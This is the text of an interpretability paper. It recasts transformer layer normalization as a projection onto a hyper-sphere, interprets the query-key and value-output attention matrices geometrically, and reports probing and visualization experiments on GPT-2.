Elhage et al. (2021) introduce "Transformer Circuits", a theoretical framework that decomposes the transformer computation into two main components: a residual stream that carries information from input to output layers, and attention/feed-forward updates that modify the information flowing in the residual stream. A key development from their work is grouping attention matrices into the virtual interaction matrices $W_{QK}$ and $W_{OV}$, exploring their role in updating the information carried throughout the transformer's residual stream. Geva et al. (2022) demonstrate that the updates from the feed-forward module can be decomposed into a linear combination of sub-updates, given by the weight matrix of the feed-forward module's second layer. This matrix directly interacts with the residual stream and allows the authors to measure the impact of each sub-update on the model's final prediction using the matrix $W_E$ as a probe. Dar et al.
(2022) incorporate these ideas to show that it is not only possible to interpret the outcomes of each transformer operation in relation to its latent space but also the weights themselves, enabling them to do zero-shot model stitching by "translating" between latent spaces of different language models. Finally, Millidge & Black (2022) note that analysis of the singular vectors of the $W_{OV}$ matrix provides better practical results when compared to analysis of its row and column weights.

A complementary perspective to the line of work on Transformer Circuits comes from the geometric interpretation of layer normalization (Ba et al., 2016) by Brody et al. (2023). The authors prove that layer normalization is equivalent to projecting features onto the hyperplane defined by the $\vec{1}$ vector and then scaling the projection by $\sqrt{d}$. They show that these properties are crucial for the attention mechanism to either attend to all keys equally or to avoid the problem of having "unselectable" keys (relevant keys within the convex hull of a set of non-relevant keys). The study by Windsor (2022) offers additional evidence for the representational power of layer normalization, visualizing the highly non-linear behavior resulting from this operation and demonstrating that, when employed as an activation function in a neural network, layer normalization can solve complex classification tasks.

In this work, we build upon these two perspectives to propose a novel geometric interpretation of transformers. In subsection 2.1, we introduce an alternative equation for layer normalization based on its geometric properties. In subsection 2.2 and subsection 2.3, we discuss the implications of this equation for the attention module, its impact on the transformer's output probabilities, and how it relates to the concept of iterative refinement. Finally, we provide results on our probing experiments in section 3, demonstrating the benefits of our approach for interpretability. An illustrated summary of the proposed geometric interpretation is given in Figure 1.

2 TRANSFORMERS AS A COMPOSITION OF GEOMETRIC PRIMITIVES

In this section, we analyze each of the transformer's components from a geometric perspective, leveraging the interpretation of one component to analyze the next. We begin with the layer normalization function, for which we demonstrate that it constrains $d$-dimensional input features to lie on the surface of a $(d - 1)$-dimensional hyper-sphere. Then we consider the role of the $W_{QK}$ matrix in terms of geometric transformations on said hyper-sphere, and the $W_{VO}$ matrix as a key-value mapping from the hyper-sphere back to $\mathbb{R}^d$, highlighting its similarities with the key-value interpretation of the feed-forward module proposed by Geva et al. (2021). Finally, we discuss the role of the embedding matrix $W_E$ in the transformer's output probabilities.

2.1 LAYER NORMALIZATION

In its original formulation (Ba et al., 2016), layer normalization is introduced using the mean $\mu$ and standard deviation $\sigma$ computed along the dimensions of an input vector $x \in \mathbb{R}^d$:

$$\text{LayerNorm}(x) = \frac{x - \mu}{\sigma}$$ (1)

However, recent work by Brody et al. (2023) presents an alternate perspective on layer normalization, interpreting it as the composition of two distinct geometric transformations.
The difference $x - \mu$ is shown to be orthogonal to the $\vec{1}$ vector, suggesting that the features of the input vector are projected onto a hyperplane $\mathcal{H}$ defined by the normal vector $\vec{1}$, and the denominator $\sigma$ is formulated in terms of the norm of the projected vector as follows: $$\sigma = \frac{1}{\sqrt{d}} \|x - \mu\|$$ (2) Building on this insight, we demonstrate (Appendix A) that the mean $\mu$ is the projection of $x$ onto the vector $\frac{1}{\sqrt{d}} \vec{1}$, as opposed to directly onto $\vec{1}$. This finding simplifies the computation of the projection of $x$ onto the hyperplane $\mathcal{H}$: \[ \text{proj}_H(x) = x - \text{proj}(x, \frac{1}{\sqrt{d}} \mathbf{1}) \\ = x - \mu \] (3) Incorporating Equation 2 and 3 into Equation 1, we obtain a geometric formula for layer normalization: \[ \text{LayerNorm}(x) = \sqrt{d} \frac{\text{proj}_H(x)}{\|\text{proj}_H(x)\|_2} \] (4) Intuitively, layer normalization projects a vector \(x \in \mathbb{R}^d\) to the hyperplane \(H\) perpendicular to \(\frac{1}{\sqrt{d}} \mathbf{1} \in \mathbb{R}^d\), and normalizes the projection such that it lies on the surface of a \(d-1\) dimensional hyper-sphere of radius \(\sqrt{d}\) (for a visual understanding of this transformation with \(d = 3\), refer to Figure 2). Furthermore, layer normalization typically incorporates a scaling factor \(\gamma\) and a bias term \(\beta\). The scaling factor \(\gamma\) acts along each coordinate axis, transforming the hyper-sphere into a hyper-ellipsoid, while the bias term \(\beta\) translates the ellipsoid’s center away from the origin (Figure 3). ![Figure 2: Layer normalization visualized on 3D data. Left: Original feature space (from randomly sampled data), with each data point color-coded according to its position in space. Right: Feature space after layer normalization, note that all data points lie within the plane perpendicular to the \(\mathbf{1}\) vector.](image) In modern implementations of the transformer, layer normalization is applied before both the attention and feed-forward module updates within each block, and once more before the final prediction step Xiong et al. (2020). We note that such an arrangement ensures that data within each transformer layer is constrained to the surface of a potentially distinct hyper-sphere. Yet, due to the residual nature of transformers, all intermediate layer representations inhabit the same vector space. As a result, features from different layers project onto a shared hyper-sphere, which we denote as \(H_S\). Interestingly, layer normalization’s placement prior to the classification softmax has another consequence. It drives the model to optimize dot-product similarity between certain points within \(H_S\) and word vectors in the embedding matrix \(W_E \in \mathbb{R}^{V \times d}\), where \(|V|\) is the vocabulary size. This optimization indirectly defines the meaning of points in \(H_S\) as a function of their similarity with words represented in \(W_E\). ### 2.2 Multi-Head Self-Attention To understand how the geometric intuition behind \(H_S\) allows for the interpretability of latent representations within a transformer, we analyze the parameter matrices in the multi-head self-attention module Vaswani et al. (2017). 
For a given input sequence \(X \in \mathbb{R}^{s \times d}\) of length \(s\), the multi-head self-attention mechanism is defined as follows:

\[ \text{MultiHead}(X) = \sum_{i=1}^{h} \text{softmax}\left(\frac{XW_{QK}^i X^T}{\sqrt{d}}\right)XW_{VO}^i \] (5)

where \( h \) is the number of self-attention heads while \( W_{QK}^i \in \mathbb{R}^{d \times d} \) and \( W_{VO}^i \in \mathbb{R}^{d \times d} \) are low-rank virtual matrices obtained by grouping the query, key, value and output projection matrices at each head (Elhage et al., 2021; Dar et al., 2022). A full derivation of Equation 5 from the original formulation by Vaswani et al. (2017) is provided in Appendix B.

### 2.2.1 The Query-Key Matrix

For any given head \( i \), the query-key matrix \( W_{QK}^i \) is commonly interpreted as a bi-linear form \( g_i : \mathbb{R}^d \times \mathbb{R}^d \rightarrow \mathbb{R} \) that represents the relevance between keys and queries. However, it is also possible to consider \( W_{QK}^i \) as a linear transformation that maps inputs to a query representation \( X_Q^i = XW_{QK}^i \), similar to that considered in Brody et al. (2023)\(^1\). The head's attention score matrix \( A^i \in [0, 1]^{s \times s} \), for a given sequence length \( s \), is then obtained as:

\[ A^i = \text{softmax}\left(\frac{X_Q^i X^T}{\sqrt{d}}\right) \] (6)

This process is illustrated for normalized inputs in the right-most section of Figure 3. Essentially, the role of the \( W_{QK} \) matrix and the layer normalization parameters is to find an affine transformation over \( H_S \) such that, when the transformed representations are superimposed on the original ones, related terms are brought closer together and unrelated terms are kept apart. It is important to mention that for head dimension \( k < d \), the matrix \( W_{QK}^i \) cannot be inverted, as it does not have full rank. This implies, by the rank-nullity theorem, that for each head, there must be a set of \( d - k \) query vectors \( Q_{null}^i \subset \mathbb{R}^d \) that map to the zero vector and, as a consequence, attend to all keys equally. Conversely, there must also exist a set of \( d - k \) keys \( K_{null}^i \subset \mathbb{R}^d \) that are attended to by all queries equally, with a pre-softmax attention score of zero.

![Figure 3](image-url)
**Figure 3**: Visualization of the self-attention process for a single head. **Left**: Layer normalization projects the input features on the surface of the hyper-sphere \( H_S \). **Center Left**: A scaling parameter \( \gamma \) is commonly applied after normalization; it transforms the hyper-sphere into a hyper-ellipsoid. **Center Right**: A bias term \( \beta \) is also applied after normalization; it displaces the hyper-ellipsoid away from the origin. **Right**: The input features are mapped to a query representation (in red) by the matrix \( W_{QK} \) and superimposed over their previous representation to obtain the self-attention scores.
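To make Equations 5 and 6 concrete, the following minimal NumPy sketch (illustrative only: random weights stand in for trained parameters, and the causal mask is omitted) computes the attention pattern of a single head from the virtual matrix $W_{QK} = W_Q W_K^\top$ after projecting the inputs onto the hyper-sphere with Equation 4:

```python
import numpy as np

def layer_norm_projection(x):
    # Equation 4: project onto the hyperplane orthogonal to the ones vector,
    # then rescale so every row lies on a hyper-sphere of radius sqrt(d).
    d = x.shape[-1]
    proj = x - x.mean(axis=-1, keepdims=True)
    return np.sqrt(d) * proj / np.linalg.norm(proj, axis=-1, keepdims=True)

rng = np.random.default_rng(0)
s, d, k = 4, 16, 4                         # sequence length, model dim, head dim
X = rng.normal(size=(s, d))
W_Q, W_K = rng.normal(size=(d, k)), rng.normal(size=(d, k))

W_QK = W_Q @ W_K.T                         # virtual query-key matrix, rank <= k
X_hat = layer_norm_projection(X)           # inputs constrained to H_S
scores = X_hat @ W_QK @ X_hat.T / np.sqrt(d)   # pre-softmax scores, Equation 6
scores -= scores.max(axis=-1, keepdims=True)   # numerical stability
A = np.exp(scores) / np.exp(scores).sum(axis=-1, keepdims=True)

print(np.linalg.matrix_rank(W_QK))         # at most k: null queries/keys exist
print(A.sum(axis=-1))                      # each row of A sums to 1
```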
### 2.2.2 The Value-Output Matrix and the Residual Stream

To understand the role of the \( W_{VO} \) matrix within the transformer, we now consider the update step after multi-head attention at a given layer \( l \):

\[ X_{l+1} = X_l + \text{MultiHead}(\text{LayerNorm}(X_l)) \] (7)

\(^1\) An alternative key representation \( X_K^i = X (W_{QK}^i)^\top \) can also be considered.

Note that by plugging in Equation 5 and Equation 6, the layer update can be re-written as:

\[ X_{l+1} = X_l + \sum_{i=1}^{h} A^i X^i_V \] (8)

where

\[ X^i_V = \text{LayerNorm}(X_l) W^i_{VO} \] (9)

It can be seen that the multi-head attention mechanism consists of the sum of \( h \) individual updates, each one given by one of the attention heads. Within each head, all words in the sequence propose an update \( X^i_V \), and these are aggregated according to their attention scores \( A^i \).

In Equation 9, the matrix \( W^i_{VO} \) transforms the normalized inputs in \( H_S \) into a set of updates in the same latent space as the residual stream. Furthermore, we propose that the \( W^i_{VO} \) matrix is better understood as a second key-value store (Sukhbaatar et al., 2015; Geva et al., 2021) within the attention layer. To see why, consider its Singular Value Decomposition (SVD) (Millidge & Black, 2022): \( W^i_{VO} = U \Sigma V^T \). By substituting in Equation 9, we obtain:

\[ X^i_V = \left( Q_{VO} (K^i_{OV})^\top \right) V^i_{OV} \] (10)

where

\[ Q_{VO} = \text{LayerNorm}(X_l), \quad K^i_{OV} = (U \Sigma)^\top, \quad V^i_{OV} = V^\top \] (11)

The left singular vectors, associated with the columns of \( U \Sigma \in \mathbb{R}^{d \times d} \), act as a library of "keys" \( K^i_{OV} \) against which the normalized features \( X_l \in H_S \) are compared, while the corresponding right singular vectors, associated with the rows of \( V^\top \in \mathbb{R}^{d \times d} \), act as the output values \( V^i_{OV} \) that define the direction in which to update the information in the residual stream for a given key. This interpretation is motivated by the results of Millidge & Black (2022), where it is shown that the right singular vectors \( V^T \) of the \( W_{VO} \) matrix tend to have interpretable meanings when decoded using \( W_E \), with some of the transformer heads consistently representing a single topic in most of their singular vectors.

We would also like to mention that, similar to the \( W_{QK} \) matrix, the \( W_{VO} \) matrix has at least \( d - k \) singular values equal to zero. This means that multiple queries \( Q_{VO} \) will map to the zero vector and thus won't update the information in the residual stream, allowing the model to skip the update process if necessary.

To conclude, we highlight that the proposed interpretation of attention behaves very similarly to that of the feed-forward module given by Geva et al. (2021), as both calculate relevance scores and aggregate sub-updates for the residual stream. However, the way the scores and updates are calculated is very different: the attention module relies primarily on dynamic context for its scores and values, while the feed-forward module relies on static representations.
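The key-value reading of Equations 10 and 11 is easy to verify numerically. In the hedged sketch below (again with random stand-in weights), the SVD factors of $W_{VO}$ reproduce the head's update exactly, and the rank deficiency discussed above shows up as vanishing singular values:

```python
import numpy as np

rng = np.random.default_rng(1)
s, d, k = 4, 16, 4
X_hat = rng.normal(size=(s, d))           # stand-in for LayerNorm(X_l) on H_S
W_V, W_O = rng.normal(size=(d, k)), rng.normal(size=(k, d))
W_VO = W_V @ W_O                          # virtual value-output matrix, rank <= k

U, S, Vt = np.linalg.svd(W_VO)
K_OV = (U * S).T                          # "keys": left singular vectors scaled by S
V_OV = Vt                                 # "values": right singular vectors

relevance = X_hat @ K_OV.T                # compare queries against the key library
update = relevance @ V_OV                 # aggregate value directions (Equation 10)

print(np.allclose(update, X_hat @ W_VO))  # True: both factorizations agree
print(int((S < 1e-8).sum()))              # at least d - k singular values vanish
```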
### 2.3 The Word Embedding Matrix and Output Probabilities

Once all the attention and feed-forward updates have been applied, the output probabilities of the network can be obtained as follows (Xiong et al., 2020):

\[ P_Y = \text{softmax}(\text{LayerNorm}(X_L) W^T_E) \] (12)

Equation 12 can be interpreted as measuring the similarity between the final layer representation \( X_L \), when projected to \( H_S \), and each of the embedding vectors in \( W_E \). Given that all vectors in the projection have the same norm \( \sqrt{d} \), the only relevant factor in deciding the output probability distribution \( P_{Y[t,:]} \in [0, 1]^{|V|} \) at a given timestep \( t \) is the location of its corresponding vector \( X_{L[t,:]} \) within \( H_S \). This behavior is very similar to that described by the von Mises-Fisher distribution (Fisher, 1953), as both represent distributions parameterized by a reference vector within a hyper-sphere. Nonetheless, in the case of transformers, the support of the distribution is defined over a discrete set of points in \( \mathbb{R}^d \) instead of the entire surface of \( H_S \), as it is for the von Mises-Fisher.

Table 1: Distance between the normalized embeddings LayerNorm($W_E$) and different transformations of the embedding matrix $W_E$.

| Setting | Mean $\ell_2$ Distance | Mean Cosine Distance |
|--------------------------|------------------------|----------------------|
| Original | 23.747 (0.432) | <0.001 (<0.001) |
| Centered | 24.872 (0.432) | 0.150 (0.035) |
| Scaled by $\sqrt{d}$ | 2.413 (1.862) | <0.001 (<0.001) |
| Centered + Scaled by $\sqrt{d}$ | 14.591 (1.469) | 0.150 (0.035) |

In the case where layer normalization includes scaling and bias parameters $\gamma$ and $\beta$, the output probabilities are calculated as follows:

$$P_Y = \text{softmax}(\hat{X}_L \Gamma W_E^T + \beta W_E^T)$$ (13)

where $\hat{X}_L$ is the projection of $X_L$ onto $H_S$ and $\Gamma$ is a diagonal matrix such that $\Gamma_{ii} = \gamma_i$. The effect of $\Gamma$ on the representation is that of transforming $H_S$ into an ellipsoid (see the center-left section of Figure 3), while $\beta W_E^T$ acts as a bias that assigns higher probability to certain tokens independent of the input.

In both cases (with and without bias and scale parameters), the proposed interpretation aligns with that of iterative refinement within transformers (Jastrzebski et al., 2017; nostalgebraist, 2020; Elhage et al., 2021; Geva et al., 2022; Belrose et al., 2023), given that intermediate representations $X_l$ can always be converted into output probabilities using Equation 12.

3 EXPERIMENTS

This section presents our experimental results. All experiments were done on a RTX 4090 GPU using pre-trained weights from the 124M parameter version of GPT-2 (Radford et al., 2019; Karpathy, 2023).
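As an illustration of how Equation 13 relates to this checkpoint, the snippet below reads the relevant tensors from the Hugging Face GPT-2 model (we assume its usual module layout, with `transformer.ln_f` holding the final layer-norm parameters and `transformer.wte` the tied embedding matrix; this is a sketch of the computation, not the code used for the experiments):

```python
import torch
from transformers import GPT2LMHeadModel

model = GPT2LMHeadModel.from_pretrained("gpt2")   # 124M parameter version
W_E = model.transformer.wte.weight.detach()        # (|V|, d) embedding matrix
gamma = model.transformer.ln_f.weight.detach()     # final layer-norm scale
beta = model.transformer.ln_f.bias.detach()        # final layer-norm bias

def output_probs(X_L):
    # Equation 13: project X_L onto H_S (Equation 4), apply scale and bias,
    # then score against every embedding vector in W_E.
    d = X_L.shape[-1]
    proj = X_L - X_L.mean(dim=-1, keepdim=True)
    X_hat = (d ** 0.5) * proj / proj.norm(dim=-1, keepdim=True)
    logits = (X_hat * gamma) @ W_E.T + beta @ W_E.T
    return logits.softmax(dim=-1)

print(output_probs(torch.randn(1, 768)).shape)     # torch.Size([1, 50257])
print((beta @ W_E.T).topk(5).indices)              # tokens favored by the bias
```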
3.1 IMPACT OF LAYER NORMALIZATION ON THE WORD EMBEDDINGS To measure the impact of layer normalization on the position of the embedding vectors $w_e \in W_E$, we calculated both the $\ell_2$ and cosine distances between the layer-normalized weights and the following settings: - Original: The original word embeddings without any modification - Centered: Original + centering around the mean $E[w_e]$ - Scaled: Original divided by the average vector norm $E[||w_e||]$ and multiplied by $\sqrt{d}$ - Centered + Scaled: Original + centering + scaling The results in Table 1 show that the mean cosine distance between the original word embeddings and the embeddings after normalization is close to zero, meaning that projection onto $H_S$ does not modify the orientation of the embedding vectors. The results also confirm this when centering is applied, as the cosine distance increases significantly when the original vectors are displaced from the origin and towards the mean. On the other hand, it can be seen that the $\ell_2$ distance is high for all settings except for when scaling is applied without centering. Given an average norm of $E[||w_e||] = 3.959$ and for $\sqrt{d} = 27.713$ we can conclude that the original word embeddings lie between the origin and $H_S$ rather than on its surface, with different embeddings having different norms. We hypothesize that variance in the norm of embedding vectors ($\text{SD}(||w_e||) = 0.434$) is likely to be a result of the use of the word embedding matrix as a classification layer (see Equation 13). To verify whether this is the case, we select the top and bottom 5 embedding vectors based on the three following criteria: --- 2 Code to replicate all experiments will be made available upon acceptance Table 2: Top 5 and Bottom 5 tokens from the word embedding matrix. | Position | Norm | Scaled Norm | Norm + Bias | Scaled Norm + Bias | |----------|---------------|-------------|-------------|--------------------| | Top 1 | SPONSORED | \xa9\xb6\xe6 | . | the | | Top 2 | \x96\x9a | tremend | the | , | | Top 3 | soDeliveryDate| \x96\x9a | . | and | | Top 4 | eneger | senal | and | a | | Top 5 | Reviewer | millenn | - | in | | Bottom 5 | for | - | \xc0 | \x07 | | Bottom 4 | an | ( | \x07 | \x0f | | Bottom 3 | on | "\n" | \x10 | oreAndOnline | | Bottom 2 | in | - | \x11 | \x06 | | Bottom 1 | at | - | \xfe | \xc1 | - **Norm**: The norm of the original embedding vector \( w_E \) - **Scaled Norm**: The norm of the embedding vector when scaled by the Layer Norm parameter \( \Gamma \) - **Norm + Bias**: The norm of the original embedding vector plus the bias scores obtained from \( \beta W_E^T \) - **Scaled Norm + Bias**: The sum between the Scaled Norm and the bias scores. The sorted tokens in Table 2 show that considering only the norm of the embeddings is not enough, as tokens that are not commonly used (like ‘SPONSORED’ and ‘soDeliveryDate’) have the highest norms, while common words like ‘for’, ‘an’, ‘on’ and ‘in’ have the lowest norm. After considering the scaling parameter \( \Gamma \), we observe that punctuation signs like the newline character or the comma ‘,’ have the lowest norm, and that there is no clear pattern on the top tokens. After considering bias, we see that the distribution of top tokens clearly shifts, with punctuation symbols and common words now at the top and uncommon bytes at the bottom. 
Finally, note that when both scale and bias are considered, the top tokens are consistent with some of the most common words in the English language: ‘the’, ‘and’, ‘a’ and ‘in’ with the only exception being the comma character, which is also very common in natural language, while the bottom tokens are related to uncommon bytes and an anomalous token. ### 3.2 Probing Attention Heads with Normalized Representations of Common Nouns Next, we probe the attention heads at layers 0, 5 and 11 of the GPT-2 model using as inputs the 100 most common nouns taken from the Corpus of Contemporary American English (COCA) (Davies 2010). First, we transform the embedding matrix \( W_E \) according to the normalization parameters specific to each layer (see Figure 3) and then multiply the normalized embeddings \( \hat{W}_E \) by either \( W_{QK} \) or \( W_{VO} \). To decode the output from \( W_{QK} \), we retrieve the top-k closest embedding vectors from \( \hat{W}_E \) based on dot product similarity. For \( W_{VO} \), we add the head-specific and layer-specific output biases (see Equation S.8) to obtain the “update vectors”. These update vectors are then added to the original embeddings from \( W_E \) and transformed according to the normalization parameters from the last layer; then, we retrieve the top-k closest embeddings from the original \( W_E \) embedding matrix based on dot product similarity. #### 3.2.1 Query-Key Transformations In Table D.1, we present partial results for the query-key transformations at layer 0, given the query inputs ‘time’, ‘life’ and ‘world’. We note that some of the heads preserve the meaning of the query, as is the case for heads 1, 5 and 10, possibly looking for repetition, while others look for keys that precede it. Such precedence heads might help to disambiguate the meaning of the words, with examples like: ‘Showtime’ vs. ‘spacetime’, ‘battery life’ vs. ‘wildlife’ and ‘underworld’ vs. ‘Westworld’. Other heads appear to be looking for contextual associations, as is the case for head 2, which seems to relate ‘world’ with dates and concepts from the First and Second World wars. When looking at deeper layers (as shown in Table D.2 & D.3), we were not able to identify any meaningful patterns on the query transformations, suggesting that these layers might look for more complex patterns that cannot be measured by probing. 3.2.2 Key-Value Transformations In Table D.4, we present partial results for the key-value transformations using the same three sample inputs. For most heads at layer 0, the meaning of the input key is kept as is. However, when the sum of all the heads is considered, we see a slight shift in the meaning of the words. For heads at layer 5 (shown in Table D.5), we see that although most of the heads preserve the meaning of the input keys ‘life’ and ‘world’ (and around half of the heads for the input ‘time’), the sum of all heads does change the word meaning dramatically, and without a clear output pattern. As our experiment is limited to testing a single input key at a time, it might be possible that updates in this layer rely more heavily on the contextual composition between multiple keys, which we did not capture. Finally, in the last layer (Table D.6), we see that most individual heads map to seemingly arbitrary values, with only a few preserving the meaning of the input key. However, when the sum of the heads is considered, the layer preserves the meaning of the input keys. 
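A simplified sketch of this probing setup is given below, assuming the Hugging Face GPT-2 layout in which `attn.c_attn` stores the fused query/key/value projection with weight shape $(d, 3d)$; the actual probing also applies the head- and layer-specific output biases, which we omit here:

```python
import torch
from transformers import GPT2LMHeadModel, GPT2Tokenizer

model = GPT2LMHeadModel.from_pretrained("gpt2")
tok = GPT2Tokenizer.from_pretrained("gpt2")
W_E = model.transformer.wte.weight.detach()
d, n_heads, layer, head = 768, 12, 0, 1
hk = d // n_heads                                   # per-head dimension k

# Assemble the head's virtual W_QK from the fused projection weights.
c_attn = model.transformer.h[layer].attn.c_attn.weight.detach()  # (d, 3d)
W_Q, W_K = c_attn[:, :d], c_attn[:, d:2 * d]
W_QK = W_Q[:, head * hk:(head + 1) * hk] @ W_K[:, head * hk:(head + 1) * hk].T

# Normalize embeddings with the layer's pre-attention LayerNorm, map the
# query word through W_QK, and retrieve the top-k keys by dot product.
ln_1 = model.transformer.h[layer].ln_1
with torch.no_grad():
    query = ln_1(W_E[tok.encode(" time")[0]]) @ W_QK
    scores = query @ ln_1(W_E).T
print(tok.convert_ids_to_tokens(scores.topk(5).indices.tolist()))
```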
To test the hypothesis that meaning-preserving heads dominate the layer update, we measured the norm of the output values for each head (before adding the layer-specific bias $\beta_O$). We found that, in most cases, these heads do not have higher norms. Instead, heads promoting common tokens like 'the', '.', and 'and' had the highest norms. These results suggest that some heads at the last layer work together to preserve the meaning of the input keys and mitigate the network's bias towards common tokens.

3.3 Probing the Singular Vectors of the Virtual Attention Matrices

3.3.1 Singular Vectors of the Key-Value Matrix

To verify whether the key-value interpretation of the $W_{VO}$ matrix proposed in Section 2.2.2 is correct, we probe each of its singular vectors (as proposed in Millidge & Black (2022)). For the left singular vectors $U$ (scaled by $\Sigma$), we use the normalized embeddings $\hat{W}_E$ as a probe, while for the right singular vectors $V^T$, we use the original embeddings $W_E$. Given that all singular values are constrained to be positive, we get two possible singular vector pairs corresponding to each singular value: $(u,v)$ and $(-u,-v)$. For ease of analysis, we choose the signed pair with its $v$ component closest to any of the embeddings $w_e \in W_E$, using the dot product similarity.

We did not observe any interpretable pattern for the attention heads at layer 0 and found only one interpretable head at layer 5 (head 10), which referred to terms in politics and chemistry. However, we found that most heads in layer 11 were interpretable (except for heads 5, 7 and 9) and present the results for all heads in Appendix E. An illustrative case of these patterns is head 3, where most of its singular vector mappings are related to jobs or industries. For example, 'Dairy' maps to 'USDA' (the United States Department of Agriculture), 'engine' to 'drivers', 'trading' to 'Sales' and so on. Similar patterns were present in other heads, listed as follows:

- **Head 0**: Formatting and punctuation symbols (end of text, new line, brackets and parenthesis)
- **Head 1**: Gender words
- **Head 2**: Proper Nouns (Places)
- **Head 3**: Jobs / Industries
- **Head 4**: Letters and Numbers
- **Head 6**: Suffixes and Prefixes related to the ending and beginning of words
- **Head 8**: Punctuation symbols
- **Head 10**: Proper Nouns (First and Last names)
- **Head 11**: The identity function (input similar to the output)

We found that these patterns were consistent with those obtained in the key → value results from Table D.6, implying that the subject-specific behavior of the singular vectors is reflected in the input-output transformations of the attention heads. These results complement previous work from Millidge & Black (2022), in which only the right singular vectors $V^T$ were considered.

3.3.2 Singular Vectors of the Query-Key Matrix

In additional experiments on the SVD of the $W_{QK}$ matrix, we found that some singular vector pairs had clear associations. For example, in head 0 of layer 0, we found some associations related to programming languages ('self, class, =, import' → 'Python') and digital cameras ('Video, 264, minutes' → 'Nikon, lineup, shot, camera'), but we could not identify any specialization for the heads in this layer.
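For reference, the signed-pair selection described in Section 3.3.1 can be sketched as a small helper (hypothetical names; the per-head $W_{VO}$ can be assembled from `attn.c_attn` and `attn.c_proj` analogously to the previous snippet):

```python
import torch

def signed_pairs(W_VO, W_E, W_E_hat):
    # SVD of a head's value-output matrix; each singular value yields the
    # pairs (u, v) and (-u, -v). Keep the sign whose v component is closest
    # (by dot product) to some embedding, then decode both directions.
    U, S, Vt = torch.linalg.svd(W_VO)
    pairs = []
    for j in range(len(S)):
        u, v = U[:, j] * S[j], Vt[j]
        if (W_E @ v).max() < (W_E @ -v).max():
            u, v = -u, -v
        key_tok = (W_E_hat @ u).argmax().item()   # probe u with normalized W_E
        val_tok = (W_E @ v).argmax().item()       # probe v with original W_E
        pairs.append((key_tok, val_tok))
    return pairs
```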
Surprisingly, we did find that heads at the last layer had identifiable patterns on their left singular vectors (associated with the queries) consistent with those listed for the $W_{VO}$ matrix (punctuation for head 0, gender for head 1, and so on), but no clear patterns were identified for the right singular vectors.

### 3.4 Visualizing Iterative Refinement

Finally, we visualize how the information in the residual stream is updated (i.e., the iterative refinement process), leveraging dimensionality reduction techniques, as shown in Figure 4. For this, we chose the test sentence 'To kill two birds with one stone', as the predictability of its last token, 'stone', given the previous context was high (correctly predicted by the model) and none of the words in the sentence repeated. To project the high-dimensional embeddings into 3D space, we used UMAP (McInnes et al., 2018), with Laplacian Eigenmap initialization (Belkin & Niyogi, 2001; Kobak & Linderman, 2021), and we fit the transform using the first 10,000 embedding vectors from $W_E$ to accurately reflect proximity in the original embedding space.

We show the original embedding tokens as reference (in blue) and plot the trajectory of the second-to-last token, 'one', as we process the entire sequence (with added positional embeddings) throughout the network. For each layer, we transform the latent representations in the residual stream using the normalization parameters from the final output layer before projecting with UMAP. It can be seen that the representation of the second-to-last token shifts from its original meaning ('one') towards the meaning of the next token ('stone'). Although the figure also shows the magnitude and direction of each update in the trajectory, it is important to mention that these quantities might have been modified by the dimensionality reduction process.

### 4 Conclusion

We have presented a new interpretation of transformer models based on the geometric intuition behind each of their components. First, we showed how layer normalization can be better understood as a projection of latent features in $\mathbb{R}^d$ to a $(d - 1)$-dimensional hyper-sphere and provided experimental evidence that the word embeddings learned by GPT-2 are distributed toward different directions of the hyper-sphere. We also demonstrated that the parameters of the final normalization layer are crucial in obtaining high-scoring tokens consistent with high-frequency tokens in the English language. Second, we discussed the role of the $W_{QK}$ and $W_{VO}$ matrices as transformations related to the hyper-sphere, with $W_{QK}$ as an affine transformation that overlaps queries and keys, and $W_{VO}$ as a key-value map between the hyper-sphere and the original embedding space. These intuitions were experimentally tested with probing experiments, showing promising results in understanding the role of query-key attention in earlier layers and extending the results from Millidge & Black (2022) on the subject-specific nature of the $W_{VO}$ matrix in attention heads at deeper layers. Finally, we integrated these ideas and the impact of each component on the residual stream to provide visual evidence of how the iterative refinement process works within transformers, illustrating the journey that occurs from a previous token to the next.

REFERENCES

Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E Hinton. Layer normalization. *arXiv preprint arXiv:1607.06450*, 2016.
Yuntao Bai, Saurav Kadavath, Sandipan Kundu, Amanda Askell, Jackson Kernion, Andy Jones, Anna Chen, Anna Goldie, Azalia Mirhoseini, Cameron McKinnon, et al. Constitutional AI: Harmlessness from AI feedback. *arXiv preprint arXiv:2212.08073*, 2022.

Mikhail Belkin and Partha Niyogi. Laplacian eigenmaps and spectral techniques for embedding and clustering. *Advances in neural information processing systems*, 14, 2001.

Nora Belrose, Zach Furman, Logan Smith, Danny Halawi, Igor Ostrovsky, Lev McKinney, Stella Biderman, and Jacob Steinhardt. Eliciting latent predictions from transformers with the tuned lens. *arXiv preprint arXiv:2303.08112*, 2023.

Shaked Brody, Uri Alon, and Eran Yahav. On the expressivity role of layernorm in transformers' attention. *arXiv preprint arXiv:2305.02582*, 2023.

Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in neural information processing systems*, 33:1877–1901, 2020.

Xiangning Chen, Chen Liang, Da Huang, Esteban Real, Kaiyuan Wang, Yao Liu, Hieu Pham, Xuanyi Dong, Thang Luong, Cho-Jui Hsieh, et al. Symbolic discovery of optimization algorithms. *arXiv preprint arXiv:2302.06675*, 2023.

Guy Dar, Mor Geva, Ankit Gupta, and Jonathan Berant. Analyzing transformers in embedding space. *arXiv preprint arXiv:2209.02535*, 2022.

Mark Davies. The corpus of contemporary american english as the first reliable monitor corpus of english. *Literary and linguistic computing*, 25(4):447–464, 2010.

Danny Driess, Fei Xia, Mehdi SM Sajjadi, Corey Lynch, Aakanksha Chowdhery, Brian Ichter, Ayzaan Wahid, Jonathan Tompson, Quan Vuong, Tianhe Yu, et al. Palm-e: An embodied multi-modal language model. *arXiv preprint arXiv:2303.03378*, 2023.

Nelson Elhage, Neel Nanda, Catherine Olsson, Tom Henighan, Nicholas Joseph, Ben Mann, Amanda Askell, Yuntao Bai, Anna Chen, Tom Conerly, et al. A mathematical framework for transformer circuits. *Transformer Circuits Thread*, 1, 2021.

Ronald Aylmer Fisher. Dispersion on a sphere. *Proceedings of the Royal Society of London. Series A. Mathematical and Physical Sciences*, 217(1130):295–305, 1953.

Mor Geva, Roei Schuster, Jonathan Berant, and Omer Levy. Transformer feed-forward layers are key-value memories. In *Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing*, pp. 5484–5495, 2021.

